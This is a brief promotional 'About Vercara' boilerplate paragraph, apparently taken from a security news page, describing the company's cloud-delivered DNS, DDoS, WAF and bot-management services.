Source: https://www.infosecurity-magazine.com/news/phishing-dominates-euwide/
About Vercara
The world’s top brands depend on Vercara to safeguard their digital infrastructure and online presence. Vercara offers a suite of cloud-delivered services that are always secure, reliable, and available and enable global businesses to thrive online. UltraSecure protects organizations’ networks and applications against risks and downtime, ensuring that businesses and their customers enjoy exceptional and uninterrupted interactions all day, every day. Delivering the industry’s best performance and always-on service, Vercara’s mission-critical security portfolio provides best-in-class DNS, application, and network security, including DDoS, WAF, and Bot management services to its global 5000 customers and beyond.